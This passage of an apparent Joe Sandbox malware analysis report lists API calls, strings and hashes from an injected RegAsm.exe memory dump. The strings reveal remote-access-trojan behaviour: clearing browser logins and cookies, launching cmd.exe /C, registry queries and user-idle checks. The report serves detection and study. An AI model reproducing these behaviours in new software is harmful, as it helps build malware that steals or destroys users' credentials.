                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                  • String ID:
                                  • API String ID: 2278895681-0
                                  • Opcode ID: 3f673537a057b7c5c2119dac0621aa7296225df49b06fea26182794cdd4a5da7
                                  • Instruction ID: 0b963310433ed909f4298f7bed4582eea210cd486c0a534cbd05f872a17047ef
                                  • Opcode Fuzzy Hash: 3f673537a057b7c5c2119dac0621aa7296225df49b06fea26182794cdd4a5da7
                                  • Instruction Fuzzy Hash: 6901D476A126157F332117B75C48CFB6A6CDAC7BA4314016FFE06C2250DA79CD4282B9
                                  APIs
                                  • _free.LIBCMT ref: 00442BE5
                                    • Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                    • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                  • _free.LIBCMT ref: 00442BF7
                                  • _free.LIBCMT ref: 00442C09
                                  • _free.LIBCMT ref: 00442C1B
                                  • _free.LIBCMT ref: 00442C2D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 3f9f08003b5c9c9a5bf46649090cab361abca7511720b0b259fe0dc2dd66b9e8
                                  • Instruction ID: 955dd411307ab1f53dee283ea2c46591a2e1c5327ced68c2c30979c1e126fd0a
                                  • Opcode Fuzzy Hash: 3f9f08003b5c9c9a5bf46649090cab361abca7511720b0b259fe0dc2dd66b9e8
                                  • Instruction Fuzzy Hash: 8DF062328082046BDA20DBA9FAC6D9B73E9EA853107941C1BF514D7740DBB8FCC047AC
                                  APIs
                                  • _free.LIBCMT ref: 00439753
                                    • Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                    • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                  • _free.LIBCMT ref: 00439765
                                  • _free.LIBCMT ref: 00439778
                                  • _free.LIBCMT ref: 00439789
                                  • _free.LIBCMT ref: 0043979A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 655d0cb59529f7d7d04c2457ca09dbe4e30996ce2a5c49b87689d855b4d02f27
                                  • Instruction ID: 9ef463557e41da891acb4cd30ea69058f6d3186d2e22c24e8b27c7661cd970de
                                  • Opcode Fuzzy Hash: 655d0cb59529f7d7d04c2457ca09dbe4e30996ce2a5c49b87689d855b4d02f27
                                  • Instruction Fuzzy Hash: D3F030B4816A51CBCA45BF28BC425553BE0E74E734B10112BF62457371F7B808698FDE
                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040D4DD
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 0040D50C
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0040D5AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Enum$InfoQueryValue
                                  • String ID: [regsplt]
                                  • API String ID: 3554306468-4262303796
                                  • Opcode ID: 299435e720278571778f3d00cc16747858d4a0d779c63fa98d5ee3cc663ccbcb
                                  • Instruction ID: cec7730470a505a3256cfe8bef0cb683ba61c19b7add015e1d9d78f1a423faa4
                                  • Opcode Fuzzy Hash: 299435e720278571778f3d00cc16747858d4a0d779c63fa98d5ee3cc663ccbcb
                                  • Instruction Fuzzy Hash: 90513D71900219AADB11EBE1DC96EEFB77CAF04304F10017AF605B2191EF786B49CB69
                                  APIs
                                  • _strpbrk.LIBCMT ref: 00440918
                                  • _free.LIBCMT ref: 00440A35
                                    • Part of subcall function 004322E3: IsProcessorFeaturePresent.KERNEL32(00000017,004322B5,00000000,00000000,00467F30,00000000,00000000,00000000,00467F30,?,004322D5,00000000,00000000,00000000,00000000,00000000), ref: 004322E5
                                    • Part of subcall function 004322E3: GetCurrentProcess.KERNEL32(C0000417), ref: 00432307
                                    • Part of subcall function 004322E3: TerminateProcess.KERNEL32(00000000), ref: 0043230E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                  • String ID: *?$.
                                  • API String ID: 2812119850-3972193922
                                  • Opcode ID: 4a7c3074ab91a6a01bd22ae712e580e20d2211959bea24d4d8b343864066331e
                                  • Instruction ID: 650f7b95baa2f55995b2d66d03bab482663cf2eccb6ced69fa93d6f4d14c5d84
                                  • Opcode Fuzzy Hash: 4a7c3074ab91a6a01bd22ae712e580e20d2211959bea24d4d8b343864066331e
                                  • Instruction Fuzzy Hash: C551D371E002099FEF14CFA9C881AAEF7B5EF58314F24416EE644E7301E6399E11CB54
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00437F9E
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00437FB3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: ~C$ ~C
                                  • API String ID: 885266447-903778833
                                  • Opcode ID: f3377a5bd023bbef2fe2ae2b30aa26cd788dc34504c359889b9b0d8bb5d82794
                                  • Instruction ID: 5e0205a4890506e29233cee9db7b7ce387702eeec4fe8001aee1c665518b7736
                                  • Opcode Fuzzy Hash: f3377a5bd023bbef2fe2ae2b30aa26cd788dc34504c359889b9b0d8bb5d82794
                                  • Instruction Fuzzy Hash: 00519EB1A04149AFCF24CF59C880AAEBBB2FF88364F18919AE85897361D734DD01CB44
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00438B43
                                  • _free.LIBCMT ref: 00438C0E
                                  • _free.LIBCMT ref: 00438C18
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  • API String ID: 2506810119-1068371695
                                  • Opcode ID: 38ec7074c0d385567f6a8a54c7fc026edc3d677d5918b93ce9d379eecf3cd1cf
                                  • Instruction ID: 8871a02dc71d87ae79a0c8c1142e0f43972f8d7c07d3df44b28c0f215ac531c3
                                  • Opcode Fuzzy Hash: 38ec7074c0d385567f6a8a54c7fc026edc3d677d5918b93ce9d379eecf3cd1cf
                                  • Instruction Fuzzy Hash: 8031A0B1A01319ABDB21DB998C8199FFBBCEB89314F1050ABF90497311DA789E44CB59
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00401F7A), ref: 00401F96
                                  • CloseHandle.KERNEL32(?), ref: 00401FED
                                  • SetEvent.KERNEL32(?), ref: 00401FFC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandleObjectSingleWait
                                  • String ID: Connection Timeout
                                  • API String ID: 2055531096-499159329
                                  • Opcode ID: 22daf8a8d436f8a122d6a1ead30463ab912d28da8f0d32497673add79ba29cff
                                  • Instruction ID: 53294a7de4bdb51bce9aa9965701b23816d0540fe960ce4e3515f9f1b139e479
                                  • Opcode Fuzzy Hash: 22daf8a8d436f8a122d6a1ead30463ab912d28da8f0d32497673add79ba29cff
                                  • Instruction Fuzzy Hash: BA012831A44B01AFD7216B768C8582A7BE1BF01305700097FE583526B1D7789400D759
                                  APIs
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040A031
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8Throw
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2005118841-1866435925
                                  • Opcode ID: a16eb189537a9ed1daadcd7a1abf2371948385d40a6e50c78772150a9fcb57ac
                                  • Instruction ID: cb096aa3a16b0a6b94bda36ceb80c3fc8b27b60b13b52bc6373e390451181ed5
                                  • Opcode Fuzzy Hash: a16eb189537a9ed1daadcd7a1abf2371948385d40a6e50c78772150a9fcb57ac
                                  • Instruction Fuzzy Hash: FE01DB7164030CAAEB10EA51C853FBA73685B0030AF20802BB906B50C3EA7C6C56862F
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0040F82E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell
                                  • String ID: /C $cmd.exe$open
                                  • API String ID: 587946157-3896048727
                                  • Opcode ID: 0517a6e350017178d7da968cd89f9d0731610964a3cb4c9304e982b3f393945e
                                  • Instruction ID: b9b5919498ba485fb8f6930109a7034d9cba9b0480c4b6652f0920fc7d9d687c
                                  • Opcode Fuzzy Hash: 0517a6e350017178d7da968cd89f9d0731610964a3cb4c9304e982b3f393945e
                                  • Instruction Fuzzy Hash: D7F062311082016AC215FB22D8569BFB7A9ABD1705F00483FB546A20D2EF7C5A4ED61E
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,771B0F10), ref: 0040D0CE
                                  • RegQueryValueExW.ADVAPI32(?,del,00000000,00000000,?,00000400), ref: 0040D0EF
                                  • RegCloseKey.ADVAPI32(?), ref: 0040D0F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: del
                                  • API String ID: 3677997916-3960539263
                                  • Opcode ID: 15ee1c042502c26f0a9d7c707821b894e9a3c11a1fe5eb1c0ec339c937e139aa
                                  • Instruction ID: c18f750833c3ba39f056a91a96db6080338cdd2eaf1d6b7373ff174bee547806
                                  • Opcode Fuzzy Hash: 15ee1c042502c26f0a9d7c707821b894e9a3c11a1fe5eb1c0ec339c937e139aa
                                  • Instruction Fuzzy Hash: 13F0C275A00218FBDB109B90DC06FDD7B7CEB04705F2040A2BA00B6191DBB46E488BDC
                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004012FF
                                  • GetProcAddress.KERNEL32(00000000), ref: 00401306
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll
                                  • API String ID: 1646373207-2714051624
                                  • Opcode ID: 3dee1189c0240d0f0416ca2e92eeb43590600ab21297a5382e44dffafad0fdfa
                                  • Instruction ID: 7a1079c1b55b5e409d7bab262d9c77c56b6c484de43da482ee61ffea879d2a08
                                  • Opcode Fuzzy Hash: 3dee1189c0240d0f0416ca2e92eeb43590600ab21297a5382e44dffafad0fdfa
                                  • Instruction Fuzzy Hash: D6B09BB4D41700D7C7141BF1DC0D54936649505B07B104135F84583191DAB8044E4F1E
                                  APIs
                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004013A4
                                  • GetProcAddress.KERNEL32(00000000), ref: 004013AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  • Opcode ID: c5fb56e5a78a3533fa0d5b6a0febd18a97217f8413de963d1376cbb78f04768d
                                  • Instruction ID: 7060e6096a3b0cf119f91b7b5660e64d53dcedb2c7a0492c07f29decda4d72cf
                                  • Opcode Fuzzy Hash: c5fb56e5a78a3533fa0d5b6a0febd18a97217f8413de963d1376cbb78f04768d
                                  • Instruction Fuzzy Hash: 15B09BB8941300D787542FF0AD0D9053A65D505B17F100479F855C3192DA75004D465F
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: b18d1eae1c5a4d1db04201d67f61c7d8a9830629fc6e21fb6dc69ff2acbd87ce
                                  • Instruction ID: 02328b9a0def9105c60072ac53d4c6597c74db7361cec4947c3cfec5fa8f093c
                                  • Opcode Fuzzy Hash: b18d1eae1c5a4d1db04201d67f61c7d8a9830629fc6e21fb6dc69ff2acbd87ce
                                  • Instruction Fuzzy Hash: 4B414E31A401006BEB216FBA8C46AAF3664FF8E374F14019BF428D63D1E67D5821566F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ee3318f8fd3b27a0ba7235ece3f8e980255d41cd4d0c8bc1ed6760f0479b9af
                                  • Instruction ID: 87f12df7f4bff9a267f7e33f5d575456b8aa141ba8f1907d633ac3855509fe08
                                  • Opcode Fuzzy Hash: 5ee3318f8fd3b27a0ba7235ece3f8e980255d41cd4d0c8bc1ed6760f0479b9af
                                  • Instruction Fuzzy Hash: A0412871A00704AFE7249F78CC01BABFBA4EB8C714F10916FF551DB781DA7AA9018788
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,?), ref: 00401BDC
                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00401BEF
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00401AC2,00000000,?,?,?,00000000,00000000), ref: 00401BFA
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00401AC2,00000000,?,?,?,00000000,00000000), ref: 00401C03
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 3360349984-0
                                  • Opcode ID: 1a05e6145b27f50bb154a03b2d11e99ccd4f2700f904e895199355e0e1e46a25
                                  • Instruction ID: 4c3b87f8b26e421484a5416da664749deae10a416ef7c933f3c1033e637f22ec
                                  • Opcode Fuzzy Hash: 1a05e6145b27f50bb154a03b2d11e99ccd4f2700f904e895199355e0e1e46a25
                                  • Instruction Fuzzy Hash: E2417171A00318ABDF11EBA1CD459EEB7BDAF14328F04012AF552B32D1DB78A905C764
                                  APIs
                                  Strings
                                  • Cleared browsers logins and cookies., xrefs: 004085DC
                                  • [Cleared browsers logins and cookies.], xrefs: 004085CB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                  • API String ID: 3472027048-1236744412
                                  • Opcode ID: 452e1f69e07f2b35f07518ea0e5366825a7b19e844b8edba28d87f063262b39e
                                  • Instruction ID: 1367f80d1a5ae34b59ca1da1382871fc212a19866b6e8415878d7c7997fe6198
                                  • Opcode Fuzzy Hash: 452e1f69e07f2b35f07518ea0e5366825a7b19e844b8edba28d87f063262b39e
                                  • Instruction Fuzzy Hash: 8431A21464C381BAC61167B51E567AB7B920B93758F09487FE8C42B3C3DDBA4809936F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 325862a9a00d25f4d929253fa3ce3015215c40d1867eeb9a88d787a8619438f4
                                  • Instruction ID: 579b40c2be03176720b1ab7dfba76c3c7b2672f3b9e2c73a2f16070f8600f84a
                                  • Opcode Fuzzy Hash: 325862a9a00d25f4d929253fa3ce3015215c40d1867eeb9a88d787a8619438f4
                                  • Instruction Fuzzy Hash: 50018FB26096173EFA211A786CC5F67235DDB493B8F20232AF532652D5DAB88C014269
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84cd3596bf9b84727abbb8ac317bd9742e37cc1944824ab92f6867873fd2e3e7
                                  • Instruction ID: 10b1f3d7627c42508a6416dc4a5d0091a6d6fc87295882acb0a4a0c041449646
                                  • Opcode Fuzzy Hash: 84cd3596bf9b84727abbb8ac317bd9742e37cc1944824ab92f6867873fd2e3e7
                                  • Instruction Fuzzy Hash: 7E01F2B29092133EFB101A786CC9D6B671CDB493B8B20232BF531612D0DEA8CD004168
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue), ref: 0043D059
                                  • GetLastError.KERNEL32(?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue,00453058,00453060,00000000,00000364,?,0043C6E6), ref: 0043D065
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue,00453058,00453060,00000000), ref: 0043D073
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: f98deec6f88989dbb97caf1a032761cc789a0d03a01cb996637bfc0b03a42118
                                  • Instruction ID: 5d9f9412c01da8515830be1498c2801d5041f6bd8c42a3f808218046de21a0a4
                                  • Opcode Fuzzy Hash: f98deec6f88989dbb97caf1a032761cc789a0d03a01cb996637bfc0b03a42118
                                  • Instruction Fuzzy Hash: 6201F736E013229BC7254B78BC44A573BB8AF4AF65F200532F91AD7250DB24D803C6EC
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 004149FD
                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 00414A11
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 00414A36
                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,004108FA), ref: 00414A44
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 3919263394-0
                                  • Opcode ID: b29290ef8a26601d1e65e3241c7cbe039584115e2aa5b79a7dea1b5784ff6f02
                                  • Instruction ID: db7a0aeb4d4afb4a2176950650ac5b06a426b4e70c5552e06deca07cffb9f33f
                                  • Opcode Fuzzy Hash: b29290ef8a26601d1e65e3241c7cbe039584115e2aa5b79a7dea1b5784ff6f02
                                  • Instruction Fuzzy Hash: D101F974A41208BFE7105B61DC85EFF776CEB863A4F10016AFD01A3280C6744E019678
                                  APIs
                                  • GetSystemMetrics.USER32(0000004C), ref: 0041228E
                                  • GetSystemMetrics.USER32(0000004D), ref: 00412294
                                  • GetSystemMetrics.USER32(0000004E), ref: 0041229A
                                  • GetSystemMetrics.USER32(0000004F), ref: 004122A1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MetricsSystem
                                  • String ID:
                                  • API String ID: 4116985748-0
                                  • Opcode ID: 053db17e7a6c52d0060b6f2d2fb2ff70657ecfa06d353a12bf392e0d8bad21fb
                                  • Instruction ID: 89de0d755d70642537d1d436af62c14b4b11da7e22818bda6a47393979baae43
                                  • Opcode Fuzzy Hash: 053db17e7a6c52d0060b6f2d2fb2ff70657ecfa06d353a12bf392e0d8bad21fb
                                  • Instruction Fuzzy Hash: 7001AC71F002286BDB109FA9CC41A9D7B95DF44760F10406BEE0CEB340D9B8AD4047C8
                                  APIs
                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000018,00000000), ref: 004146B1
                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000018,00000000), ref: 004146C4
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 004146EF
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 004146F7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleOpenProcess
                                  • String ID:
                                  • API String ID: 39102293-0
                                  • Opcode ID: 1af01056c3ae6bb1cb7cae0660ad155511764e7b69f07d9f8ce8de45e1cfa6e6
                                  • Instruction ID: b8317d07de67e98f9920d3d33bcb499745fd15691e2d04bf827ba3f8c6195df7
                                  • Opcode Fuzzy Hash: 1af01056c3ae6bb1cb7cae0660ad155511764e7b69f07d9f8ce8de45e1cfa6e6
                                  • Instruction Fuzzy Hash: 98014E753002046BD61057545C49FFB736CDB8579AF000166FA88D2190EFAC8C81456E
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0042FA28
                                    • Part of subcall function 00430060: ___AdjustPointer.LIBCMT ref: 004300AA
                                  • _UnwindNestedFrames.LIBCMT ref: 0042FA3F
                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 0042FA51
                                  • CallCatchBlock.LIBVCRUNTIME ref: 0042FA75
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                  • String ID:
                                  • API String ID: 2633735394-0
                                  • Opcode ID: 3bc4621ae17e63219c49621585e226d06ab1c41b19007eb81c6da07df0bbe7b5
                                  • Instruction ID: 46f6367602a7af8e8c080bc3d9db011f884b2cca7bf67df38f357a6d7b2bfad7
                                  • Opcode Fuzzy Hash: 3bc4621ae17e63219c49621585e226d06ab1c41b19007eb81c6da07df0bbe7b5
                                  • Instruction Fuzzy Hash: 1B011B32100118BBCF129F56DC05EDB7BB6FF48714F45812AF91862121C37AE865DB94
                                  APIs
                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0042E743
                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0042E748
                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0042E74D
                                    • Part of subcall function 00431D68: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00431D79
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0042E762
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                  • String ID:
                                  • API String ID: 1761009282-0
                                  • Opcode ID: bc6d224e8d5b72e5f3cec7e581ad8da2a683ecd1731032797a77a3d4aa2a10c8
                                  • Instruction ID: 553a3698c3aa90dbaf59acd9f5d3f90f695d611f681d1e27becbad91c9f45b66
                                  • Opcode Fuzzy Hash: bc6d224e8d5b72e5f3cec7e581ad8da2a683ecd1731032797a77a3d4aa2a10c8
                                  • Instruction Fuzzy Hash: 7FC04818604220512EA8BAB333032AE03000CEB3DDFE434CFACA5272239E0E340B603F
                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 0043BD3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: 4b91a563d960731c995c8f312f2b7ca282ace2253d8e8cdccd3d1816b9aa4853
